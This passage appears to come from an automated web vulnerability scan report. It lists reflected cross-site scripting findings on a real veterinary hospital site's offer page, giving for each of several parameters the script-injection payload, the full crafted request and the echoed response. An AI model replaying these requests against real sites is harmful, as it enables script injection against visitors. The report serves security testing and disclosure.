vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=imqt3ohs1kmrs8q3jmpiu4dts2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2
...[SNIP]...

2.59. http://www.vcahospitals.com/main/offer/ [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48e0"><script>alert(1)</script>069a700961f was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1do3gpr45inrh2l3itveglepn0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2
...[SNIP]...

2.60. http://www.vcahospitals.com/main/offer/ [fname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c53f7"><script>alert(1)</script>b1eee91948e was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0rnbm532tpcf38n3r359evpem3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%
...[SNIP]...

2.61. http://www.vcahospitals.com/main/offer/ [formtype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3af"><script>alert(1)</script>0e53c8134ea was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=793suj2hh05lka8bp2u1fr5153; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%2
...[SNIP]...

2.62. http://www.vcahospitals.com/main/offer/ [guid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6319b"><script>alert(1)</script>4f2f2352eeb was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:10 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.63. http://www.vcahospitals.com/main/offer/ [ipaddress parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e17"><script>alert(1)</script>9ed82f767a0 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ogu2vsddhd2jlpm5p5r0vhodr5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP
...[SNIP]...

2.64. http://www.vcahospitals.com/main/offer/ [lname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5910"><script>alert(1)</script>83c5d7c83ea was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
